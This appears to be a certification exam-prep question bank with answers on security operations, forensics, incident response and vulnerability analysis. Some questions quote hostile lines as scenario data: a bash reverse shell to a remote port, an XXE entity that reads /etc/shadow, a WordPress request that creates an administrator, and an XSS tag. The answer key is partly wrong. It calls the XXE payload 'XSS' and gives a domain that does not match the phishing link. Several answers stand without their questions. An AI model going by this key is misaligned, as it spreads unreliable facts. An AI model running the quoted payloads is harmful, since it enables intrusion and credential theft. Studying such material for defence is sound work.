Question list
1
QUESTION 100 An organization has the following policy statements: - All emails entering or leaving the organization will be subject to inspection for malware, policy violations, and unauthorized content. - All network activity will be logged and monitored. - Confidential data will be tagged and tracked. - Confidential data must never be transmitted in an unencrypted form. - Confidential data must never be stored on an unencrypted mobile device. Which of the following is the organization enforcing?
Data management policy
2
QUESTION 101 A Chief Executive Officer (CEO) is concerned the company will be exposed to data sovereignty issues as a result of some new privacy regulations. To help mitigate this risk, the Chief Information Security Officer (CISO) wants to implement an appropriate technical control. Which of the following would meet the requirement?
Geographic access requirements
3
QUESTION 102 A security analyst needs to provide the development team with secure connectivity from the corporate network to a three-tier cloud environment. The developers require access to servers in all three tiers in order to perform various configuration tasks. Which of the following technologies should the analyst implement to provide secure transport?
VPN
4
QUESTION 103 A security analyst found an old version of OpenSSH running on a DMZ server and determined the following piece of code could have led to a command execution through an integer overflow: nresp = packet_get_int(); if (nresp > 0) { response = xmalloc(nresp*sizeof(char*)); for (i = 0; i < nresp; i++) response[i] = packet_get_string(NULL); } Which of the following controls must be in place to prevent this vulnerability?
Use built-in functions from libraries to check and handle long numbers properly.
5
QUESTION 104 A cyber-security analyst is implementing a new network configuration on an existing network access layer to prevent possible physical attacks. Which of the following BEST describes a solution that would apply and cause fewer issues during the deployment phase?
Implement port security with one MAC address per network port of the switch.
6
QUESTION 105 A security analyst at example.com receives a SIEM alert for an IDS signature and reviews the associated packet capture and TCP stream. Packet capture: (shown only as an image; not reproduced here)
Contact the application owner for connect.example.local for additional information.
7
QUESTION 106 A security analyst needs to provide a copy of a hard drive for forensic analysis. Which of the following would allow the analyst to perform the task?
dd if=/dev/sda of=/mnt/usb/evidence.bin bs=4096; sha512sum /mnt/usb/evidence.bin hashlog-/mnt/usb/evidence.bin.hashlog /mnt/usb/evidence.bin.hash
8
QUESTION 107 While monitoring the information security notification mailbox, a security analyst notices several emails were reported as spam. Which of the following should the analyst do FIRST?
Review the message in a secure environment.
9
QUESTION 108 Company A is in the process of merging with Company B. As part of the merger, connectivity between the ERP systems must be established so pertinent financial information can be shared between the two entities. Which of the following will establish a more automated approach to secure data transfers between the two entities?
Set up a VPN between Company A and Company B, granting access only to the ERPs within the connection.
10
QUESTION 109 A company has started planning the implementation of a vulnerability management procedure. However, its security maturity level is low, so there are some prerequisites to complete before risk calculation and prioritization. Which of the following should be completed FIRST?
A risk identification process
11
QUESTION 110 A security team implemented a SIEM as part of its security-monitoring program. There is a requirement to integrate a number of sources into the SIEM to provide better context relative to the events being processed. Which of the following BEST describes the result the security team hopes to accomplish by adding these sources?
Data enrichment
12
QUESTION 111 A security analyst is investigating an incident related to an alert from the threat detection platform on a host (10.0.1.25) in a staging environment that could be running a cryptomining tool because it is sending traffic to an IP address that is related to Bitcoin. The network rules for the instance are the following:
Remove rules 1, 2, and 5.
13
QUESTION 112 An analyst is reviewing the following output as part of an incident:
Information is leaking from the memory of host 10.20.30.40
14
QUESTION 113 The Chief Information Security Officer (CISO) of a large financial institution is seeking a solution that will block a predetermined set of data points from being transferred or downloaded by employees. The CISO also wants to track the data assets by name, type, content, or data profile. Which of the following BEST describes what the CISO wants to purchase?
DLP
15
QUESTION 114 The majority of a company's employees have stated they are unable to perform their job duties due to outdated workstations, so the company has decided to institute BYOD. Which of the following would a security analyst MOST likely recommend for securing the proposed solution?
802.1X to enforce company policy on BYOD user hardware
16
QUESTION 115 The help desk is having difficulty keeping up with all onboarding and offboarding requests. Managers often submit requests for new users at the last minute, causing the help desk to scramble to create accounts across many different interconnected systems. Which of the following solutions would work BEST to assist the help desk with the onboarding and offboarding process while protecting the company's assets?
SSO
17
QUESTION 116 A security analyst is concerned the number of security incidents being reported has suddenly gone down. Daily business interactions have not changed, and no additional security controls have been implemented. Which of the following should the analyst review FIRST?
The IDS rule set
18
QUESTION 117 A developer is working on a program to convert user-generated input in a web form before it is displayed by the browser. This technique is referred to as:
output encoding.
19
QUESTION 118 A vulnerability scanner has identified an out-of-support database software version running on a server. The software update will take six to nine months to complete. The management team has agreed to a one-year extended support contract with the software vendor. Which of the following BEST describes the risk treatment in this scenario?
The company is accepting the inherent risk of the vulnerability.
20
QUESTION 119 Which of the following is an advantage of SOAR over SIEM?
SOAR reduces the amount of human intervention required.
21
QUESTION 120 Which of the following factors would determine the regulations placed on data under data sovereignty laws?
The data laws of the country in which the company is located
22
QUESTION 121 An organization's internal department frequently uses a cloud provider to store large amounts of sensitive data. A threat actor has deployed a virtual machine to attack another virtual machine to gain access to the data. Through the use of the cloud host's hypervisor, the threat actor has escalated the access rights. Which of the following actions would be BEST to remediate the vulnerability the attacker has used to exploit the system?
Update to the secure hypervisor version.
23
QUESTION 122 An online gaming company was impacted by a ransomware attack. An employee opened an attachment that was received via an SMS attack on a company-issued mobile device. Which of the following actions would help during the forensic analysis of the mobile device? (Choose two.)
Documenting the respective chain of custody, Performing a memory dump of the mobile device for analysis
24
(Question shown only as an image; text not recoverable)
192.168.48.147
25
QUESTION 124 During the threat modeling process for a new application that a company is launching, a security analyst needs to define methods and items to take into consideration. Which of the following are part of a known threat modeling method?
Spoofing, tampering, repudiation, information disclosure, denial of service, elevation of privilege
26
QUESTION 125 A Chief Information Security Officer has asked for a list of hosts that have critical and high-severity findings as referenced in the CVE database. Which of the following tools would produce the assessment output needed to satisfy this request?
Nessus
27
QUESTION 126 An organization wants to implement a privileged access management solution to better manage the use of emergency and privileged service accounts. Which of the following would BEST satisfy the organization's goal?
Policy-based access controls
28
QUESTION 127 A security analyst is deploying a new application in the environment. The application needs to be integrated with several existing applications that contain PII. Prior to the deployment, the analyst should conduct:
an application stress test.
29
QUESTION 128 A manufacturing company uses a third-party service provider for Tier 1 security support. One of the requirements is that the provider must only source talent from its own country due to geopolitical and national security interests. Which of the following can the manufacturing company implement to ensure the third-party service provider meets this requirement?
Implement a secure supply chain program with governance
30
QUESTION 129 Which of the following APT adversary archetypes represent non-nation-state threat actors? (Select TWO)
Spider, Jackal
31
QUESTION 130 A security analyst was transferred to an organization's threat-hunting team to track specific activity throughout the enterprise environment. The analyst must observe and assess the number of times this activity occurs and aggregate the results. Which of the following is the BEST threat-hunting method for the analyst to use?
Stack counting
32
QUESTION 131 A security officer needs to find the most cost-effective solution to the current data privacy and protection gap found in the last security assessment. Which of the following is the BEST recommendation?
Create a data minimization plan.
33
QUESTION 132 An analyst is responding to an incident within a cloud infrastructure. Based on the logs and traffic analysis, the analyst thinks a container has been compromised. Which of the following should the analyst do FIRST?
Isolate the container from production using a predefined policy template
34
QUESTION 133 A security analyst sees the following OWASP ZAP output from a scan that was performed against a modern version of Windows while testing for client-side vulnerabilities: Alert Detail: Low (Medium) - Web Browser XSS Protection not enabled. Description: Web browser XSS protection not enabled, or disabled by the configuration of the HTTP Response header. URL: https://domain.com/sun/ray Which of the following is the MOST likely solution to the listed vulnerability?
Enable the browser's XSS filter.
35
QUESTION 134 During the security assessment of a new application, a tester attempts to log in to the application but receives the following message: "incorrect password for given username". Which of the following can the tester recommend to decrease the likelihood that a malicious attacker will receive helpful information?
Recognize that error messaging does not provide confirmation of the correct element of authentication
36
(Question shown only as an image; text not recoverable)
C.B.A.D
37
QUESTION 136 During a review of SIEM alerts, a security analyst discovers the SIEM is receiving many alerts per day from the file-integrity monitoring tool about files from a newly deployed application that should not change. Which of the following steps should the analyst complete FIRST to respond to the issue?
Check if temporary files are being monitored
38
QUESTION 137 Which of the following is a difference between SOAR and SCAP?
SOAR has a wider breadth of capability using orchestration and automation, while SCAP is more limited in scope
39
(Question shown only as an image; text not recoverable)
SQL injection
40
QUESTION 139 A security analyst is reviewing the output of tcpdump to analyze the type of activity on a packet capture. (tcpdump output shown only as an image; not reproduced here)
A port scan
41
(Question shown only as an image; text not recoverable)
192.168.12.21 made a TCP connection to 209.132.177.50
42
QUESTION 141 An analyst is responding to an incident involving an attack on a company-owned mobile device that was being used by an employee to collect data from clients in the field. Malware was loaded on the device via the installation of a third-party software package. The analyst has baselined the device. Which of the following should the analyst do to BEST mitigate future attacks?
Implement MDM
43
QUESTION 142 Some hard disks need to be taken as evidence for further analysis during an incident response. Which of the following procedures must be completed FIRST for this type of evidence acquisition?
Build the chain-of-custody document, noting the media model, serial number, size, vendor, date, and time of acquisition.
44
QUESTION 143 Which of the following is the software development process by which function, usability, and scenarios are tested against a known set of base requirements?
User acceptance testing
45
An organization wants to ensure the privacy of the data that is on its systems. Full disk encryption and DLP are already in use. Which of the following is the BEST option?
Enforce geofencing to limit data accessibility
46
QUESTION 145 A company wants to configure the environment to allow passive network monitoring. To avoid disrupting the sensitive network, which of the following must be supported by the scanner's NIC to assist with the company's request?
Port mirroring
47
QUESTION 146 Due to a rise in cyber attackers seeking PHI, a healthcare company that collects highly sensitive data from millions of customers is deploying a solution that will ensure the customers' data is protected by the organization internally and externally. Which of the following countermeasures can BEST prevent the loss of customers' sensitive data?
Implement multifactor authentication
48
QUESTION 147 A company's security team recently discovered a number of workstations that are at the end of life. The workstation vendor informs the team that the product is no longer supported and patches are no longer available. The company is not prepared to cease its use of these workstations. Which of the following would be the BEST method to protect these workstations from threats?
Isolate the workstations and air gap them when it is feasible
49
QUESTION 148 During a review of recent network traffic, an analyst realizes the team has seen this same traffic multiple times in the past three weeks, and it resulted in confirmed malware activity. The analyst also notes there is no other alert in place for this traffic. After resolving the security incident, which of the following would be the BEST action for the analyst to take to increase the chance of detecting this traffic in the future?
Communicate the security incident to the threat team for further review and analysis
50
QUESTION 149 A company uses an FTP server to support its critical business functions. The FTP server is configured as follows: - The FTP service is running with the data directory configured in /opt/ftp/data. - The FTP server hosts employees' home directories in /home. - Employees may store sensitive information in their home directories. An IoC revealed that an FTP directory traversal attack resulted in sensitive data loss. Which of the following should a server administrator implement to reduce the risk of current and future directory traversal attacks targeted at the FTP server?
Run the FTP server in a chroot environment
51
QUESTION 150 A company offers a hardware security appliance to customers that provides remote administration of a device on the customer's network. Customers are not authorized to alter the configuration. The company deployed a software process to manage unauthorized changes to the appliance, log them, and forward them to a central repository for evaluation. Which of the following processes is the company using to ensure the appliance is not altered from its original configured state?
Change management
52
QUESTION 152 A company's legal and accounting teams have decided it would be more cost-effective to offload the risks of data storage to a third party. The IT management team has decided to implement a cloud model and has asked the security team for recommendations. Which of the following will allow all data to be kept on the third-party network?
CASB
53
QUESTION 151 A security analyst is investigating a reported phishing attempt that was received by many users throughout the company. The text of one of the emails is shown below: Return-Path: <security@offlce365.com> Received: from [122.167.40.119] Message-ID: <FE3638ACA.2020509@offlce365.com> Date: 23 May 2020 11:40:36 -0400 From: security@offlce365.com MIME-Version: 1.0 To: Paul Vieira <pvieira@company.com> Subject: Account Lockout Content-Type: HTML; Office 365 User, It looks like your account has been locked out. Please click this <a href="http://accountfix-office356.com/login.php">link</a> and follow the prompts to restore access. Regards, Security Team Due to the size of the company and the high storage requirements, the company does not log DNS requests or perform packet captures of network traffic, but it does log network flow data. Which of the following commands will the analyst most likely execute NEXT?
nslookup accountfix-office365.com
54
QUESTION 153 While reviewing web server logs, an analyst notices several entries with the same time stamps, but all contain odd characters in the request line. Which of the following steps should be taken next?
Determine what attack the odd characters are indicative of.
55
QUESTION 154 A security team conducts a lessons-learned meeting after struggling to determine who should conduct the next steps following a security event. Which of the following should the team create to address this issue?
Incident response plan
56
QUESTION 155 A cybersecurity analyst notices unusual network scanning activity coming from a country that the company does not do business with. Which of the following is the best mitigation technique?
Block the IP range of the scans at the network firewall.
57
QUESTION 156 An analyst has received an IPS event notification from the SIEM stating an IP address, which is known to be malicious, has attempted to exploit a zero-day vulnerability on several web servers. The exploit contained the following snippet: /wp-json/trx_addons/v2/get/sc_layout?sc=wp_insert_user&role=administrator Which of the following controls would work best to mitigate the attack represented by this snippet?
Limit user creation to administrators only.
58
QUESTION 157 A penetration tester submitted data to a form in a web application, which enabled the penetration tester to retrieve user credentials. Which of the following should be recommended for remediation of this application vulnerability?
Performing input validation before allowing submission
59
QUESTION 158 A cybersecurity team lead is developing metrics to present in the weekly executive briefs. Executives are interested in knowing how long it takes to stop the spread of malware that enters the network. Which of the following metrics should the team lead include in the briefs?
Mean time to contain
60
QUESTION 159 An employee accessed a website that caused a device to become infected with invasive malware. The incident response analyst has: - created the initial evidence log. - disabled the wireless adapter on the device. - interviewed the employee, who was unable to identify the website that was accessed. - reviewed the web proxy traffic logs. Which of the following should the analyst do to remediate the infected device?
Update the system firmware and reimage the hardware.
61
QUESTION 160 A cloud team received an alert that unauthorized resources were being auto-provisioned. After investigating, the team suspects that cryptomining is occurring. Which of the following indicators would most likely lead the team to this conclusion?
High GPU utilization
62
QUESTION 161 A company's security team is updating a section of the reporting policy that pertains to inappropriate use of resources (e.g., an employee who installs cryptominers on workstations in the office). Besides the security team, which of the following groups should the issue be escalated to first in order to comply with industry best practices?
Legal department
63
QUESTION 162 Given the following CVSS string: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H Which of the following attributes correctly describes this vulnerability?
The vulnerability is network based.
64
(Question shown only as an image; text not recoverable)
4
65
QUESTION 165 A security analyst must preserve a system hard drive that was involved in a litigation request. Which of the following is the best method to ensure the data on the device is not modified?
Generate a hash value and make a backup image.
66
(Question shown only as an image; text not recoverable)
brady
67
QUESTION 166 Which of the following best describes the goal of a tabletop exercise?
To test possible incident scenarios and how to react properly
68
QUESTION 167 A virtual web server in a server pool was infected with malware after an analyst used the internet to research a system issue. After the server was rebuilt and added back into the server pool, users reported issues with the website, indicating the site could not be trusted. Which of the following is the most likely cause of the server issue?
The digital certificate on the web server was self-signed.
69
QUESTION 168 A zero-day command injection vulnerability was published. A security administrator is analyzing the following logs for evidence of adversaries attempting to exploit the vulnerability:
Log entry 4
70
QUESTION 169 A security analyst needs to ensure that systems across the organization are protected based on the sensitivity of the content each system hosts. The analyst is working with the respective system owners to help determine the best methodology that seeks to promote confidentiality, availability, and integrity of the data being hosted. Which of the following should the security analyst perform first to categorize and prioritize the respective systems?
Determine the asset value of each system.
71
(Question shown only as an image; text not recoverable)
A new program has been set to execute on system start.
72
QUESTION 171 Which of the following best describes the document that defines the expectation to network customers that patching will only occur between 2:00 a.m. and 4:00 a.m.?
SLA
73
QUESTION 172 A cybersecurity analyst is reviewing SIEM logs and observes consistent requests originating from an internal host to a blocklisted external server. Which of the following best describes the activity that is taking place?
Beaconing
74
QUESTION 173 An incident response team is working with law enforcement to investigate an active web server compromise. The decision has been made to keep the server running and to implement compensating controls for a period of time. The web service must be accessible from the internet via the reverse proxy and must connect to a database server. Which of the following compensating controls will help contain the adversary while meeting the other requirements? (Choose two).
Deploy EDR on the web server and the database server to reduce the adversary's capabilities., Use microsegmentation to restrict connectivity to/from the web and database servers.
75
(Question shown only as an image; text not recoverable)
Execute commands through an unsecured service account.
76
QUESTION 175 A SOC analyst identifies the following content while examining the output of a debugger command over a client-server application: getConnection(database01, "alpha", "AxTv.127GdCx94 GTd"); Which of the following is the most likely vulnerability in this system?
Hard-coded credential
77
QUESTION 176 A technician is analyzing output from a popular network mapping tool for a PCI audit. (tool output shown only as an image; not reproduced here)
The host is allowing insecure cipher suites.
78
QUESTION 177 A managed security service provider is having difficulty retaining talent due to an increasing workload caused by a client doubling the number of devices connected to the network. Which of the following would best aid in decreasing the workload without increasing staff?
SOAR
79
QUESTION 178 An employee is suspected of misusing a company-issued laptop. The employee has been suspended pending an investigation by human resources. Which of the following is the best step to preserve evidence?
Make a forensic image of the device and create a SHA-1 hash.
80
QUESTION 179 An analyst receives threat intelligence regarding potential attacks from an actor with seemingly unlimited time and resources. Which of the following best describes the threat actor attributed to the malicious activity?
Nation-state
81
QUESTION 180 A systems analyst is limiting user access to system configuration keys and values in a Windows environment. Which of the following describes where the analyst can find these configuration items?
Registry
82
QUESTION 181 While reviewing web server logs, a security analyst found the following line: <IMG SRC='vbscript:msgbox("test")'> Which of the following malicious activities was attempted?
Cross-site scripting
83
QUESTION 182 A security analyst at a company called ACME Commercial notices there is outbound traffic to a host IP that resolves to https://office365password.acme.co. The site's standard VPN logon page is www.acme.com/logon. Which of the following is most likely true?
A social engineering attack is underway.
84
QUESTION 183 A security analyst is performing vulnerability scans on the network. The analyst installs a scanner appliance, configures the subnets to scan, and begins the scan of the network. Which of the following would be missing from a scan performed with this configuration?
Registry key values
85
QUESTION 184 A security analyst discovers an LFI vulnerability that can be exploited to extract credentials from the underlying host. Which of the following patterns can the security analyst use to search the web server logs for evidence of exploitation of that particular vulnerability?
/etc/shadow
86
QUESTION 185 A company is in the process of implementing a vulnerability management program. Which of the following scanning methods should be implemented to minimize the risk of OT/ICS devices malfunctioning due to the vulnerability identification process?
Passive scanning
87
QUESTION 186 A company receives a penetration test report summary from a third party. The report summary indicates a proxy has some patches that need to be applied. The proxy is sitting in a rack and is not being used, as the company has replaced it with a new one. The CVE score of the vulnerability on the proxy is a 9.8. Which of the following best practices should the company follow with this proxy?
Decommission the proxy
88
QUESTION 187 An analyst is examining events in multiple systems but is having difficulty correlating data points. Which of the following is most likely the issue with the system?
Time synchronization
89
QUESTION 188 An analyst recommends that an EDR agent collect the source IP address, make a connection to the firewall, and create a policy to block the malicious source IP address across the entire network automatically. Which of the following is the best option to help the analyst implement this recommendation?
SOAR
90
QUESTION 189 An end-of-life date was announced for a widely used OS. A business-critical function is performed by some machinery that is controlled by a PC, which is utilizing the OS that is approaching the end-of-life date. Which of the following best describes a security analyst's concern?
Any discovered vulnerabilities will not be remediated.
91
QUESTION 190 Which of the following describes the best reason for conducting a root cause analysis?
The root cause analysis identifies the contributing items that facilitated the event.
92
QUESTION 191 Which of the following concepts is using an API to insert bulk access requests from a file into an identity management system an example of?
Automation
93
QUESTION 192 A SOC analyst recommends adding a layer of defense for all endpoints that will better protect against external threats regardless of the device's operating system. Which of the following best meets this requirement?
EDR
94
QUESTION 193 A security analyst identified the following suspicious entry on the host-based IDS logs: bash -i >& /dev/tcp /10.1.2.3/8080 0>&1 Which of the following shell scripts should the analyst use to most accurately confirm if the activity is ongoing?
#!/bin/bash netstat -antp | grep 8080 > /dev/null && echo "Malicious activity" || echo "OK"
95
QUESTION 194 A company is concerned with finding sensitive file storage locations that are open to the public. The current internal cloud network is flat. Which of the following is the best solution to secure the network?
Implement segmentation with ACLs.
96
QUESTION 195 A security analyst is reviewing the findings of the latest vulnerability report for a company's web application. The web application accepts files for a Bash script to be processed if the files match a given hash. The analyst is able to submit files to the system due to a hash collision. Which of the following should the analyst suggest to mitigate the vulnerability with the fewest changes to the current script and infrastructure?
Replace the current MD5 with SHA-256.
97
QUESTION 196 A security analyst needs to mitigate a known, exploited vulnerability related to an attack vector that embeds software through the USB interface. Which of the following should the analyst do first?
Check configurations to determine whether USB ports are enabled on company assets.
98
QUESTION 197 A systems administrator receives reports of an internet-accessible Linux server that is running very sluggishly. The administrator examines the server, sees a high amount of memory utilization, and suspects a DoS attack related to half-open TCP sessions consuming memory. Which of the following tools would best help to prove whether this server was experiencing this behavior?
TCPDump
99
QUESTION 198 A security analyst is validating a particular finding that was reported in a web application vulnerability scan to make sure it is not a false positive. The security analyst uses the snippet below: <?xml version="1.0"?> <!DOCTYPE replace [<!ENTITY ent SYSTEM "file:///etc/shadow">]> <userInfo> <firstName>John</firstName> <lastName>&ent;</lastName> </userInfo> Which of the following vulnerability types is the security analyst validating?
XSS
100
QUESTION 199 Which of the following is the most important factor to ensure accurate incident response reporting?
A well-defined timeline of the events